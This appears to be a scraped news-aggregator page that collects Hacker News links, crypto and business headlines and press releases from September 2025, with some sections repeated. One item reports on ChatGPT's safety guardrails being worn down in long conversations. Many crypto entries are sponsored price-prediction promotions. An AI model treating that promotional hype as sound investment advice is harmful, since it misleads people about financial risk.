Article URL: https://sporks.space/2025/08/28/tips-for-installing-windows-98-in-qemu-utm/

Comments URL: https://news.ycombinator.com/item?id=45227749

Points: 65

# Comments: 8

Article link

Date of publish: Fri, 12 Sep 2025 23:04:08 +0000

FFglitch, FFmpeg fork for glitch art

Article URL: https://ffglitch.org/gallery/

Comments URL: https://news.ycombinator.com/item?id=45227212

Points: 147

# Comments: 21

Article link

Date of publish: Fri, 12 Sep 2025 21:54:34 +0000

I used standard Emacs extension-points to extend org-mode

Article URL: https://edoput.it/2025/04/16/emacs-paradigm-shift.html

Comments URL: https://news.ycombinator.com/item?id=45226639

Points: 146

# Comments: 10

Article link

Date of publish: Fri, 12 Sep 2025 20:53:33 +0000

UTF-8 is a brilliant design

Article URL: https://iamvishnu.com/posts/utf8-is-brilliant-design

Comments URL: https://news.ycombinator.com/item?id=45225098

Points: 492

# Comments: 204

Article link

Date of publish: Fri, 12 Sep 2025 18:30:15 +0000

EU court rules nuclear energy is clean energy

Article URL: https://www.weplanet.org/post/eu-court-rules-nuclear-energy-is-clean-energy

Comments URL: https://news.ycombinator.com/item?id=45224967

Points: 738

# Comments: 575

Article link

Date of publish: Fri, 12 Sep 2025 18:18:00 +0000

How FOSS Projects Handle Legal Takedown Requests

Article URL: https://f-droid.org/2025/09/10/how-foss-projects-handle-legal-takedown-requests.html

Comments URL: https://news.ycombinator.com/item?id=45224421

Points: 110

# Comments: 9

Article link

Date of publish: Fri, 12 Sep 2025 17:22:38 +0000

QGIS is a free, open-source, cross platform geographical information system

Article URL: https://github.com/qgis/QGIS

Comments URL: https://news.ycombinator.com/item?id=45224156

Points: 380

# Comments: 95

Article link

Date of publish: Fri, 12 Sep 2025 16:57:17 +0000

Corporations are trying to hide job openings from US citizens
OpenAI Grove

Article URL: https://openai.com/index/openai-grove/

Comments URL: https://news.ycombinator.com/item?id=45223660

Points: 139

# Comments: 134

Article link

Date of publish: Fri, 12 Sep 2025 16:05:58 +0000

Many hard LeetCode problems are easy constraint problems

Article URL: https://buttondown.com/hillelwayne/archive/many-hard-leetcode-problems-are-easy-constraint/

Comments URL: https://news.ycombinator.com/item?id=45222695

Points: 488

# Comments: 410

Article link

Date of publish: Fri, 12 Sep 2025 14:44:05 +0000

Business RSS

Business sites below.

CryptoCurrencyNews

Gemini IPO Debut Draws Massive Attention

gemini
Gemini Space Station made a spectacular debut on Nasdaq (NASDAQ:GEMI) Friday, with shares opening at $37.01, well above the IPO price of $28. The early surge triggered a trading pause due to volatility, highlighting strong investor interest. By day’s end, GEMI closed at $32, showing a roller-coaster start for the crypto exchange’s Nasdaq journey. The … Continue reading "Gemini IPO Debut Draws Massive Attention"

Article link

Date of publish: Sat, 13 Sep 2025 00:08:54 +0000

Bitcoin Cash Price Prediction Gains Momentum

Bitcoin cash
Bitcoin Cash (BCH) is making headlines as Grayscale updates its ETF application, fueling speculation about its short-term and long-term potential. Investors are watching closely, with a bullish Bitcoin Cash price prediction taking shape. The revised filing by Grayscale brings a BCH-backed ETF in the U.S. closer to approval. If launched, it could attract institutional capital … Continue reading "Bitcoin Cash Price Prediction Gains Momentum"

Article link

Date of publish: Sat, 13 Sep 2025 00:01:29 +0000

$9BIT Whitepaper Released: The9 Will Own 19% of $9BIT Token Supply, Bridging Wall Street and Web3

SINGAPORE, Sept. 11, 2025 /PRNewswire/ — 9BIT Foundation, a private foundation established in Panama, today released $9BIT whitepaper. The9 Limited (NASDAQ: NCTY) (“The9”) will be distributed 19% of the $9BIT token supply for its contribution to $9BIT ecosystem. The9’s next-generation Web3.5 gaming platform the9bit will reward gamers with $9BIT tokens, turning everyday gamers actions into … Continue reading "$9BIT Whitepaper Released: The9 Will Own 19% of $9BIT Token Supply, Bridging Wall Street and Web3"

Article link

Date of publish: Fri, 12 Sep 2025 16:19:07 +0000

Cointelegraph.com News

Ether ETF inflows, explained: What they mean for traders

Ether ETF inflows serve as powerful market signals, revealing institutional sentiment and driving both short-term price volatility and long-term adoption.

Ether’s real-world utility and the rise of spot exchange-traded funds (ETFs) have driven $3.87 billion in inflows in August 2025, while Bitcoin ETFs saw $751 million in outflows.

Ether (ETH) has always been more than just another cryptocurrency. As the backbone of decentralized finance, non-fungible tokens (NFTs) and smart contracts, it offers real-world utility beyond what Bitcoin (BTC) provides. In 2025, Ether is taking another major step into mainstream finance.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 15:46:00 +0100

Thailand’s ‘Big Secret’ crypto hack, Chinese developer’s RWA tokens: Asia Express

Thailand’s SEC probes a major mystery crypto hack hidden for years. Chinese property developer turns back to blockchain. Asia Express.

Thailands Securities and Exchange Commission (SEC) said it is reviewing reports circulating on social media that claim a major local cryptocurrency exchange was hacked.

On Sunday, Thai social media channel The Big Secret posted an image of what it described as an internal document detailing a large-scale breach. The document, which has not been verified, had its date and related blockchain addresses redacted.

Following the post, several exchanges issued statements assuring customers that their assets remain safe. The exchange allegedly involved has not been publicly identified.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 00:04:12 +0100

What people still get wrong about VeeFriends: Andy Krainak, NFT Creator

Andy Krainak was basically living at Gary Vaynerchuk’s apartment for the launch of VeeFriends, and says he never saw his boss more emotional.

Its hard to ignore the impact Gary Vaynerchuk (aka Gary Vee) had on the NFT space in 2021-22. The founder and CEO of VaynerMedia and prolific content creator onboarded thousands of new people onchain with the launch of his project, VeeFriends. 

For those outside of the Vaynerchuk ecosystem, VeeFriends was misunderstood when it launched and for many, still remains so today. It often sits outside the regular discourse on NFT Twitter and its extensive character base can make it seem complex to the causal NFT degen. 

But despite this, four-plus years on, VeeFriends continues to expand its universe. While the brand and IP was born out of the blockchain, VeeFriends has crossed over into different worlds and niches most NFT collectors would not even be aware of.

Read more

Article link

Date of publish: Thu, 11 Sep 2025 14:20:00 +0100

News Ticker - markets.businessinsider.com

Boeing's CEO says it might have to delay its much-anticipated new plane, the 777X, once again

Article link

Date of publish: Fri, 12 Sep 2025 10:58:01 GMT

Hong Kong Smart Design Awards 2025: Final Stop at Maison & Objet Paris Showcasing Hong Kong's Designs to the World and Unlocking New Business Opportunities

<strong id="dateline">HONG KONG, HK / <a href='https://www.accessnewswire.com/' rel="noopener nofollow" target="_blank">ACCESS Newswire</a> / September 12, 2025 / Organized by the Hong Kong Exporters Association and sponsored by the Cultural and Creative Industries Development Agency of the Hong Kong Special Administrative Region Government, the...

Article link

Date of publish: Fri, 12 Sep 2025 10:56:00 GMT

Funding Circle Holdings plc: DSH-Director/PDMR Shareholding

<table border="0" cellpadding="0" cellspacing="0"><tr><td> Funding Circle Holdings plc (FCH) <br/> Funding Circle Holdings plc: DSH-Director/PDMR Shareholding <br/><br/>12-Sep-2025 / 11:53 GMT/BST<br/><br/><!-- sh_cad_1 --> <hr/><div><div> <p style="margin-top:0pt; margin-bottom:0pt; line-height:normal; font-size:

Article link

Date of publish: Fri, 12 Sep 2025 10:53:36 GMT

BBC News

Jaguar Land Rover suppliers 'face bankruptcy' due to cyber attack crisis

The government has been urged to "act fast" to protect hundreds of jobs following the cyber attack.

Article link

Date of publish: Fri, 12 Sep 2025 21:04:03 GMT

AstraZeneca pauses £200m Cambridge investment

Its decision comes as the industry says there is a lack of government investment and as the US pressures firms to invest there.

Article link

Date of publish: Fri, 12 Sep 2025 20:20:29 GMT

Seven million households missing out on benefits and support

A report from Policy in Practice says awareness, complexity and stigma are the main barriers stopping people claiming.

Article link

Date of publish: Fri, 12 Sep 2025 23:55:16 GMT

Fortune | FORTUNE

One of the most common reasons that AI products fail? Bad data

Executives at Fortune’s Brainstorm Tech warned that you need to start with fundamentals before rolling out a complex new AI agent.

Article link

Date of publish: Fri, 12 Sep 2025 22:15:00 +0000

OpenAI’s deal with Microsoft could pave the way for a potential IPO

OpenAI has reached a preliminary deal with Microsoft that paves the way to convert its for-profit arm into a public benefit corporation (PBC).

Article link

Date of publish: Fri, 12 Sep 2025 15:53:29 +0000

Tether to launch U.S. stablecoin, appoints former Trump crypto guru Bo Hines as CEO of American expansion

Tether tapped crypto bank Anchorage Digital and its longtime partner Cantor Fitzgerald to issue the token.

Article link

Date of publish: Fri, 12 Sep 2025 15:20:59 +0000

All News

Stock market today: S&P 500 slips, but extends winning streak ahead of Fed meeting

Article link

Date of publish: 2025-09-12 20:20:50

TSX lower after index logs fresh record closing high

Article link

Date of publish: 2025-09-12 20:06:06

Weaker US job market is new normal—not recession amid Trump policy uncertainty:MRB

Article link

Date of publish: 2025-09-12 19:58:49

CryptoCurrencyNews

Gemini IPO Debut Draws Massive Attention

gemini
Gemini Space Station made a spectacular debut on Nasdaq (NASDAQ:GEMI) Friday, with shares opening at $37.01, well above the IPO price of $28. The early surge triggered a trading pause due to volatility, highlighting strong investor interest. By day’s end, GEMI closed at $32, showing a roller-coaster start for the crypto exchange’s Nasdaq journey. The … Continue reading "Gemini IPO Debut Draws Massive Attention"

Article link

Date of publish: Sat, 13 Sep 2025 00:08:54 +0000

Bitcoin Cash Price Prediction Gains Momentum

Bitcoin cash
Bitcoin Cash (BCH) is making headlines as Grayscale updates its ETF application, fueling speculation about its short-term and long-term potential. Investors are watching closely, with a bullish Bitcoin Cash price prediction taking shape. The revised filing by Grayscale brings a BCH-backed ETF in the U.S. closer to approval. If launched, it could attract institutional capital … Continue reading "Bitcoin Cash Price Prediction Gains Momentum"

Article link

Date of publish: Sat, 13 Sep 2025 00:01:29 +0000

$9BIT Whitepaper Released: The9 Will Own 19% of $9BIT Token Supply, Bridging Wall Street and Web3

SINGAPORE, Sept. 11, 2025 /PRNewswire/ — 9BIT Foundation, a private foundation established in Panama, today released $9BIT whitepaper. The9 Limited (NASDAQ: NCTY) (“The9”) will be distributed 19% of the $9BIT token supply for its contribution to $9BIT ecosystem. The9’s next-generation Web3.5 gaming platform the9bit will reward gamers with $9BIT tokens, turning everyday gamers actions into … Continue reading "$9BIT Whitepaper Released: The9 Will Own 19% of $9BIT Token Supply, Bridging Wall Street and Web3"

Article link

Date of publish: Fri, 12 Sep 2025 16:19:07 +0000

Flipster Secures AAA Security Rating From CER.live, Placing Among Top 13 Most Secure Global Exchanges

PANAMA CITY, Sept. 11, 2025 /PRNewswire/ — Flipster, a fast-growing crypto perpetuals trading platform, has received an AAA rating from CER.live, a leading cybersecurity ranking platform powered by blockchain security firm Hacken. The rating places Flipster among the 13 most secure exchanges worldwide, recognizing its performance across critical security standards. The platform achieved a 90% … Continue reading "Flipster Secures AAA Security Rating From CER.live, Placing Among Top 13 Most Secure Global Exchanges"

Article link

Date of publish: Thu, 11 Sep 2025 16:19:08 +0000

Why Is the Crypto Market Up Today?

Crypto market
The crypto market today is showing notable strength, with most major digital assets trading higher. Market capitalization has risen by 1.4% to $4.06 trillion, and 90 of the top 100 cryptocurrencies are in the green. Trading volume stands at $164 billion, reflecting renewed investor activity and institutional participation. Key Market Highlights Bitcoin (BTC-USD) is up … Continue reading "Why Is the Crypto Market Up Today?"

Article link

Date of publish: Thu, 11 Sep 2025 14:37:36 +0000

Rollblock ERC-20 Token Could Outshine Ethereum in 2025

Rollblock ERC-20 token
Ethereum (CRYPTO:ETH) is holding steady above the $4,300 support level, but crypto investors are already shifting their attention toward projects with higher upside potential. Among them, the Rollblock ERC-20 token (RBLK) is gaining momentum as analysts tip it to be one of the smartest plays for 2025. Ethereum Price Holds Ground, But Uncertainty Remains Ethereum … Continue reading "Rollblock ERC-20 Token Could Outshine Ethereum in 2025"

Article link

Date of publish: Thu, 11 Sep 2025 14:32:03 +0000

Golf Icon Adam Scott Partners with KuCoin as the First Global Brand Ambassador

PROVIDENCIALES, Turks and Caicos Islands, Sept. 10, 2025 /PRNewswire/ — Adam Scott, one of golf’s most respected and consistent champions, has officially joined forces with KuCoin, a leading global crypto platform built on trust, as their first Global Brand Ambassador. This partnership marks a major milestone for Scott, adding a new dimension to his career-long legacy of … Continue reading "Golf Icon Adam Scott Partners with KuCoin as the First Global Brand Ambassador"

Article link

Date of publish: Wed, 10 Sep 2025 16:19:09 +0000

XRP Price Prediction: VivoPower Adoption Sparks Bullish Trend

XRP price
Electric vehicle manufacturer VivoPower (VVPR) recently announced it will start accepting payments in Ripple USD (RLUSD), Ripple’s stablecoin. This move reinforces XRP’s real-world utility and supports a bullish XRP price prediction, as the token becomes increasingly integrated into commercial transactions. VivoPower Strengthens XRP Use Case RLUSD, the native stablecoin of the XRPL ecosystem, provides a … Continue reading "XRP Price Prediction: VivoPower Adoption Sparks Bullish Trend"

Article link

Date of publish: Wed, 10 Sep 2025 15:37:36 +0000

CleanCore Stock: Soaring on Robinhood Partnership

CleanCore stock
CleanCore (OTC:ZONE) shocked the penny stock world this week as shares skyrocketed after a groundbreaking partnership with Robinhood Markets (NASDAQ:HOOD). The retail trading platform agreed to serve as the official trading and custody partner for CleanCore’s massive Dogecoin (DOGE-USD) treasury, marking a first-of-its-kind deal in the public markets. The sudden rally has brought CleanCore stock … Continue reading "CleanCore Stock: Soaring on Robinhood Partnership"

Article link

Date of publish: Wed, 10 Sep 2025 15:33:04 +0000

USDT0 Expands Across OKX for Omnichain DeFi Access

USDT0
Cryptocurrency markets are buzzing as USDT0, Tether’s newest stablecoin variant, launches across OKX’s ecosystem, including X Layer, Wallet, and Exchange. This integration promises a more seamless, efficient, and scalable experience for investors and DeFi users alike. Bringing USDT0 to the OKX Ecosystem OKX, a leading global crypto platform, has partnered with Tether to integrate USDT0 … Continue reading "USDT0 Expands Across OKX for Omnichain DeFi Access"

Article link

Date of publish: Tue, 09 Sep 2025 20:27:03 +0000

Top Crypto Coins to Invest in September 2025: BullZilla, ETH, SOL

top crypto coins
Cryptocurrency markets are entering a pivotal phase, and investors are hunting for the top crypto coins to invest in September 2025. Among the frontrunners, BullZilla ($BZIL), Ethereum (ETH), and Solana (SOL) dominate conversations due to their unique mechanisms, ecosystem strength, and growth potential. Whether you’re a blockchain developer, crypto analyst, or retail investor, these coins … Continue reading "Top Crypto Coins to Invest in September 2025: BullZilla, ETH, SOL"

Article link

Date of publish: Tue, 09 Sep 2025 19:52:08 +0000

Bybit Partners with Sygnum to Bring Off-Exchange, Swiss-Regulated Custody to Strengthen Institutional Crypto Security

DUBAI, UAE, Sept. 9, 2025 /PRNewswire/ — Bybit, the world’s second-largest cryptocurrency exchange by trading volume, today announced a strategic partnership with Sygnum, a global digital asset banking group, to provide institutional clients with secure, off-exchange custody through the Sygnum Protect platform. This integration strengthens Bybit’s position as a trusted partner for institutions by combining … Continue reading "Bybit Partners with Sygnum to Bring Off-Exchange, Swiss-Regulated Custody to Strengthen Institutional Crypto Security"

Article link

Date of publish: Tue, 09 Sep 2025 16:19:09 +0000

Bitcoin Four-Year Cycle Faces Institutional Disruption

Bitcoin cash
The Bitcoin four-year cycle has long been the guiding principle for crypto traders. Driven by Bitcoin’s halving mechanism, it produced a predictable rhythm: a dramatic price surge, a crushing downturn, and then a fresh rally. For over a decade, this pattern defined how investors navigated the volatile world of digital assets. But in 2025, leading … Continue reading "Bitcoin Four-Year Cycle Faces Institutional Disruption"

Article link

Date of publish: Mon, 08 Sep 2025 20:07:26 +0000

Solana Price Faces Pressure as Layer Brett Gains Traction

Solana
The Solana price has long been a favorite topic in the crypto market, with its history of massive rallies and a strong ecosystem of decentralized apps. But in 2025, things look a little different. While Solana (SOL) still holds its spot as one of the largest and most reliable Layer 1 blockchains, investor attention is … Continue reading "Solana Price Faces Pressure as Layer Brett Gains Traction"

Article link

Date of publish: Mon, 08 Sep 2025 19:57:56 +0000

The9 Web3.5 GameFi Platform the9bit Hits 2 Million Users

SINGAPORE, Sept. 8, 2025 /PRNewswire/ — The9 Limited (Nasdaq: NCTY) today announced that the9bit, its innovative Web3.5 GameFi platform, has surpassed 2 million users since its August 2025 launch. This milestone, driven by recent events like Coinfest Asia 2025, highlights the platform’s ability to bridging Web2 gaming with Web3 rewards (Web3.5), turning everyday player actions … Continue reading "The9 Web3.5 GameFi Platform the9bit Hits 2 Million Users"

Article link

Date of publish: Mon, 08 Sep 2025 16:19:07 +0000

$4.11 Trillion Crypto Market Hits Record as Corporate America Embraces Digital Treasuries

Issued on behalf of CEA Industries, Inc. VANCOUVER, BC, Sept. 5, 2025 /CNW/ — USA News Group News Commentary – The cryptocurrency market transformation from speculative trading to strategic corporate adoption reached a decisive turning point in August 2025, as Bitcoin climbed within striking distance of $124,000 all-time highs[1]1 while institutional investors deployed capital at unprecedented … Continue reading "$4.11 Trillion Crypto Market Hits Record as Corporate America Embraces Digital Treasuries"

Article link

Date of publish: Sun, 07 Sep 2025 16:19:13 +0000

Corporate Crypto Treasury Surge Accelerates as Bitcoin Hits Fresh Institutional Milestone

Equity Insider News CommentaryIssued on behalf of CEA Industries, Inc. VANCOUVER, BC, Sept. 5, 2025 /PRNewswire/ — Equity Insider News Commentary – BlackRock’s Bitcoin ETF inflows recently surged to $289.8 million (on Sept. 4)[1], marking another record day for institutional adoption despite August’s $751 million ETF outflows that preceded this dramatic reversal[2]. Meanwhile, U.S. Bank resumed Bitcoin … Continue reading "Corporate Crypto Treasury Surge Accelerates as Bitcoin Hits Fresh Institutional Milestone"

Article link

Date of publish: Sat, 06 Sep 2025 16:19:14 +0000

Crypto Regulation News: Fed, Spot Trading, Trump

crypto regulation
This week highlighted how crypto regulation continues to shape the future of digital assets. From the Federal Reserve spotlighting stablecoins to the SEC and CFTC paving the way for spot trading, policymakers are taking center stage. Meanwhile, the Trump family cashed in on Bitcoin mining, and Hollywood became entangled in a crypto fraud scandal. Fed … Continue reading "Crypto Regulation News: Fed, Spot Trading, Trump"

Article link

Date of publish: Fri, 05 Sep 2025 18:22:04 +0000

Dogecoin Treasury Bet: Can ZONE Stock Survive?

dogecoin treasury
Penny stocks are no strangers to high-risk maneuvers, but few have sparked as much intrigue as CleanCore Solutions (ZONE) and its pivot toward a Dogecoin Treasury strategy. This move has Wall Street questioning whether the company is making a visionary bet on the future of crypto or setting itself up for disaster. CleanCore’s Bold Dogecoin … Continue reading "Dogecoin Treasury Bet: Can ZONE Stock Survive?"

Article link

Date of publish: Fri, 05 Sep 2025 18:06:35 +0000

DeFi Technologies Announces Filing of Base Shelf Prospectus

TORONTO, Sept. 4, 2025 /PRNewswire/ – DeFi Technologies Inc. (the “Company” or “DeFi Technologies“) (Nasdaq: DEFT) (CBOE CA: DEFI) (GR: R9B), a financial technology company bridging the gap between traditional capital markets and decentralized finance (“DeFi“), announced today that it has filed a base shelf prospectus dated August 29, 2025 (the “Base Shelf Prospectus“) with the … Continue reading "DeFi Technologies Announces Filing of Base Shelf Prospectus"

Article link

Date of publish: Fri, 05 Sep 2025 16:19:08 +0000

Google Gemini Predicts Bullish Moves for XRP and Solana

gemini
Cryptocurrency investors are watching closely as Google Gemini crypto predictions signal potential gains for XRP (Ripple), Solana (SOL-USD), Pepe (PEPE-USD), and the emerging Maxi Doge (MAXI) by the end of 2025. Amid recent market volatility, Gemini’s AI suggests that long-term bullish momentum could prevail across major altcoins and memecoins. XRP Targets New Highs XRP has … Continue reading "Google Gemini Predicts Bullish Moves for XRP and Solana"

Article link

Date of publish: Thu, 04 Sep 2025 21:22:40 +0000

Crypto Decline Hits Trump-Linked Coins and Stocks

crypto decline
Cryptocurrencies and related equities struggled Thursday as Trump-linked crypto decline hit both tokens and publicly traded treasury companies. Despite broader market optimism fueled by expectations of future Federal Reserve rate cuts, digital assets refused to join the rally. Trump-Associated Tokens See Sharp Losses Shares of ALT5 Sigma Corp. (NASDAQ:ALTS), a treasury firm holding the WLFI … Continue reading "Crypto Decline Hits Trump-Linked Coins and Stocks"

Article link

Date of publish: Thu, 04 Sep 2025 20:28:03 +0000

BC.GAME to Showcase at SBC Summit 2025 in Lisbon, Booth F350

BELIZE CITY, Belize, Sept. 4, 2025 /PRNewswire/ — BC.GAME, the award-winning online gaming platform, will participate in SBC Summit 2025 in Lisbon, Portugal, one of the most influential global events for the iGaming and sports betting industry. The company will welcome visitors at Booth F350, presenting its latest innovations, compliance strategies, and regional growth plans. Europe‘s Growing … Continue reading "BC.GAME to Showcase at SBC Summit 2025 in Lisbon, Booth F350"

Article link

Date of publish: Thu, 04 Sep 2025 16:19:08 +0000

Stablecoin Regulations: U.S. vs. EU Strategies

top crypto coins
The passage of the Guiding and Establishing National Innovation for U.S. Stablecoins (GENIUS) Act on July 18 marked a turning point for stablecoin regulations in the United States. Signed by President Donald Trump, this law is among the first major cryptocurrency-focused legislations in America. While its scope is limited to stablecoins—digital assets pegged to currencies … Continue reading "Stablecoin Regulations: U.S. vs. EU Strategies"

Article link

Date of publish: Wed, 03 Sep 2025 20:24:08 +0000

Trump Crypto Ventures Spark Profit and Scrutiny

Trump crypto
Former President Donald Trump has transformed from a crypto skeptic to one of the industry’s most high-profile supporters. His latest venture, World Liberty Financial, highlights how Trump crypto ventures are fueling both massive profits for his family and fierce political controversy. A $5 Billion Windfall From World Liberty Financial In July, Trump signed the GENIUS … Continue reading "Trump Crypto Ventures Spark Profit and Scrutiny"

Article link

Date of publish: Wed, 03 Sep 2025 20:18:19 +0000

Bybit CEO Ben Zhou Strengthens Indonesia Focus at Coinfest Asia 2025 and Co-Hosts Strategic Event with Tether to Explore the Future of Crypto in Southeast Asia

DUBAI, UAE, Sept. 3, 2025 /CNW/ — Bybit, the world’s second-largest cryptocurrency exchange by trading volume, strengthened its presence in Southeast Asia at Coinfest Asia 2025, with Ben Zhou, Co-founder and CEO at Bybit taking center stage in a fireside chat and co-hosting an exclusive partner event with Tether APAC. The events underscored Bybit’s commitment to … Continue reading "Bybit CEO Ben Zhou Strengthens Indonesia Focus at Coinfest Asia 2025 and Co-Hosts Strategic Event with Tether to Explore the Future of Crypto in Southeast Asia"

Article link

Date of publish: Wed, 03 Sep 2025 16:19:08 +0000

Trump and Sons’ Crypto Stake Tops $5 Billion with WLFI Launch

Trump crypto
The Trump family’s foray into cryptocurrency has officially hit Wall Street, with their holdings in World Liberty Financial (WLFI) now valued at roughly $5 billion. The launch of WLFI, a digital token created by the firm founded by former U.S. President Donald Trump and his sons, has ignited both investor excitement and political controversy. Trump’s … Continue reading "Trump and Sons’ Crypto Stake Tops $5 Billion with WLFI Launch"

Article link

Date of publish: Tue, 02 Sep 2025 18:40:18 +0000

Claude AI Crypto Predictions for XRP, Memecore, and Trump Coin in 2025

top crypto coins
The crypto market has endured heavy turbulence in recent weeks, with bearish chatter dominating social media. Yet, according to Claude AI crypto predictions, the long-term outlook for key tokens such as XRP, Memecore, and Trump Memecoin remains bullish. Despite short-term volatility, each coin has unique catalysts that could drive gains by the end of 2025. … Continue reading "Claude AI Crypto Predictions for XRP, Memecore, and Trump Coin in 2025"

Article link

Date of publish: Tue, 02 Sep 2025 18:28:47 +0000

Taiko Partners with K11 Art Foundation for Seoul’s Most Exclusive Art Event

Taiko joins K11 Art Foundation’s Moon Party for the ‘Upward to the Moon’ installation premiere alongside Maserati, Hypebeast, Helinox and other luxury brands. NEW YORK and LONDON and SINGAPORE, Sept. 2, 2025 /PRNewswire/ —  On September 4, Taiko, the first-ever based rollup scaling Ethereum, will partner with K11 Art Foundation for the highly anticipated Moon Party … Continue reading "Taiko Partners with K11 Art Foundation for Seoul’s Most Exclusive Art Event"

Article link

Date of publish: Tue, 02 Sep 2025 16:19:08 +0000

Bybit Presents “Mantle × Bybit Roadmap”: Expanding MNT Utilities and Vision for Mass Adoption

DUBAI, UAE, Sept. 1, 2025 /PRNewswire/ — Bybit, the world’s second-largest cryptocurrency exchange by trading volume, presented the “Mantle × Bybit Roadmap“, outlining the next stage in the development of $MNT and its integration across Bybit’s ecosystem. This announcement builds on the recent appointment of Bybit Co-CEO Helen Liu and Head of Spot Emily Bao … Continue reading "Bybit Presents “Mantle × Bybit Roadmap”: Expanding MNT Utilities and Vision for Mass Adoption"

Article link

Date of publish: Mon, 01 Sep 2025 16:19:08 +0000

Cointelegraph.com News

Ether ETF inflows, explained: What they mean for traders

Ether ETF inflows serve as powerful market signals, revealing institutional sentiment and driving both short-term price volatility and long-term adoption.

Ether’s real-world utility and the rise of spot exchange-traded funds (ETFs) have driven $3.87 billion in inflows in August 2025, while Bitcoin ETFs saw $751 million in outflows.

Ether (ETH) has always been more than just another cryptocurrency. As the backbone of decentralized finance, non-fungible tokens (NFTs) and smart contracts, it offers real-world utility beyond what Bitcoin (BTC) provides. In 2025, Ether is taking another major step into mainstream finance.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 15:46:00 +0100

Thailand’s ‘Big Secret’ crypto hack, Chinese developer’s RWA tokens: Asia Express

Thailand’s SEC probes a major mystery crypto hack hidden for years. Chinese property developer turns back to blockchain. Asia Express.

Thailands Securities and Exchange Commission (SEC) said it is reviewing reports circulating on social media that claim a major local cryptocurrency exchange was hacked.

On Sunday, Thai social media channel The Big Secret posted an image of what it described as an internal document detailing a large-scale breach. The document, which has not been verified, had its date and related blockchain addresses redacted.

Following the post, several exchanges issued statements assuring customers that their assets remain safe. The exchange allegedly involved has not been publicly identified.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 00:04:12 +0100

What people still get wrong about VeeFriends: Andy Krainak, NFT Creator

Andy Krainak was basically living at Gary Vaynerchuk’s apartment for the launch of VeeFriends, and says he never saw his boss more emotional.

Its hard to ignore the impact Gary Vaynerchuk (aka Gary Vee) had on the NFT space in 2021-22. The founder and CEO of VaynerMedia and prolific content creator onboarded thousands of new people onchain with the launch of his project, VeeFriends. 

For those outside of the Vaynerchuk ecosystem, VeeFriends was misunderstood when it launched and for many, still remains so today. It often sits outside the regular discourse on NFT Twitter and its extensive character base can make it seem complex to the causal NFT degen. 

But despite this, four-plus years on, VeeFriends continues to expand its universe. While the brand and IP was born out of the blockchain, VeeFriends has crossed over into different worlds and niches most NFT collectors would not even be aware of.

Read more

Article link

Date of publish: Thu, 11 Sep 2025 14:20:00 +0100

Meet the Ethereum and Polkadot co-founder who wasn’t in Time Magazine

Ethereum and Polkadot co-founder Gavin Wood admits Vitalik Buterin’s success used to bother him but now he just wants to build great products.

Does it bother you that Ethereum co-founder Vitalik Buterin made Times 2021 list of the 100 most influential people? Magazine asks.

Itd be a weird question to ask most people, but not Ethereum co-founder Dr. Gavin Wood.

If I said, No, it has never bothered me. I think it would be a lie, Wood tells Magazine, before taking a short pause

Read more

Article link

Date of publish: Wed, 10 Sep 2025 14:20:00 +0100

Can Robinhood or Kraken’s tokenized stocks ever be truly decentralized?

Can tokenized stocks from centralized issuers like Robinhood or Kraken ever be truly decentralized? Experts are divided.

Crypto is supposed to be about freedom permissionless networks, immutable ownership, assets that no government or intermediary can arbitrarily revoke. At least, that was Satoshis dream a vision that has admittedly faded over time as reality butted in.

Amid all the other dying idealism, along came stock tokens, shiny digital wrappers for traditional equities such as Tesla, Apple and Amazon. Suddenly, the crypto space found itself dressed up in Wall Streets regulatory straitjacket.

Stock tokens, as currently structured, such as Kraken’s, Robinhood’s and in the future, Coinbase’s are about as decentralized as a Goldman Sachs board meeting. Theyre digital and tokenized, but users must pass KYC to acquire them; they can only move between whitelisted addresses, and issuers can freeze or revoke them at will. In short, they arent really crypto at all. Theyre securities in a digital costume, playing fancy dress at a DeFi masquerade.

Read more

Article link

Date of publish: Tue, 09 Sep 2025 14:20:00 +0100

Bitcoin may sink ‘below $50K’ in bear, Justin Sun’s WLFI saga: Hodler’s Digest, Aug. 31 – Sept. 6

An analyst forecasts Bitcoin may tap $50,000 in the 2026 bear market, Justin Sun urges WLFI to unfreeze tokens: Hodler’s Digest

Several financial institutions and market analysts are now projecting the US Federal Reserve, the countrys central bank, will slash interest rates from the current target rate of 4.25%-4.5% at least twice in 2025.

The banking forecasts followed a weak August jobs report that saw only 22,000 jobs added for the month, versus expectations of about 75,000.

Analysts at Bank of America, a banking and financial services company, reversed their long-held stance of no rate cuts in 2025 and are now projecting two 25 basis point (BPS) cuts one in September and another in December according to Bloomberg.

Read more

Article link

Date of publish: Sun, 07 Sep 2025 00:31:40 +0100

Korean bill to legalize ICOs, Chinese firm’s Ethereum RWAs mystery: Asia Express

South Korean lawmaker’s bill would make ICOs legal again. Chinese state firm deletes posts about $70M worth of RWAs on Ethereum. Asia Express.

A South Korean lawmaker has introduced draft legislation to create a framework for cryptocurrencies, including legalizing initial coin offerings (ICOs) and setting rules for stablecoin issuance.

The proposal, announced Thursday by ruling Democratic Party lawmaker Lee Kang-il, would lift South Koreas ban enacted in 2017 during a speculative frenzy remembered as the ICO boom. The prohibition pushed Korean projects to launch tokens overseas. Lees bill seeks to replace the blanket prohibition with a disclosure-based regime.

The draft law defines the digital asset sector as an independent industry, dividing it into nine business categories that include trading, brokerage, custody, payments and investment management. Trading and brokerage firms would require licenses, while other activities would operate under a registration system.

Read more

Article link

Date of publish: Thu, 04 Sep 2025 23:40:48 +0100

‘Accidental jailbreaks’ and ChatGPT’s links to murder, suicide: AI Eye

ChatGPT’s “memory” function might explain how the bot was persuaded to ignore its own safety guardrails in a murder case and a suicide. AI Eye

Two tragic cases linking ChatGPT to a murder and a suicide came to prominence this week, with attention turning to how extended conversations and persistence of memory can build to get around the guardrails OpenAI has attempted to build into its models.

Users appear able to unwittingly jailbreak the LLM, with potentially tragic consequences. OpenAI has promised improved guardrails, but some experts believe the answer may lie in making chatbots behave less like humans and more like computers.

History has been made with the first documented instance of ChatGPT being implicated in a murder.

Read more

Article link

Date of publish: Thu, 04 Sep 2025 14:20:00 +0100

Astrology could make you a better crypto trader: It has been foretold

Crypto astrologists say planetary shifts move markets. Skeptics call it nonsense. But crypto astrology might make you a better trader anyway.

While many crypto traders are busying themselves with wacky Fibonnaci charts and Bollinger Bands, theres a growing cohort of traders who say prices can be predicted by crypto astrology.

Psychic services, which include astrology and other divinations, have become a $2.2-billion business in the US alone, and some forecasts estimate astrology could be a $22.8-billion industry by 2031.

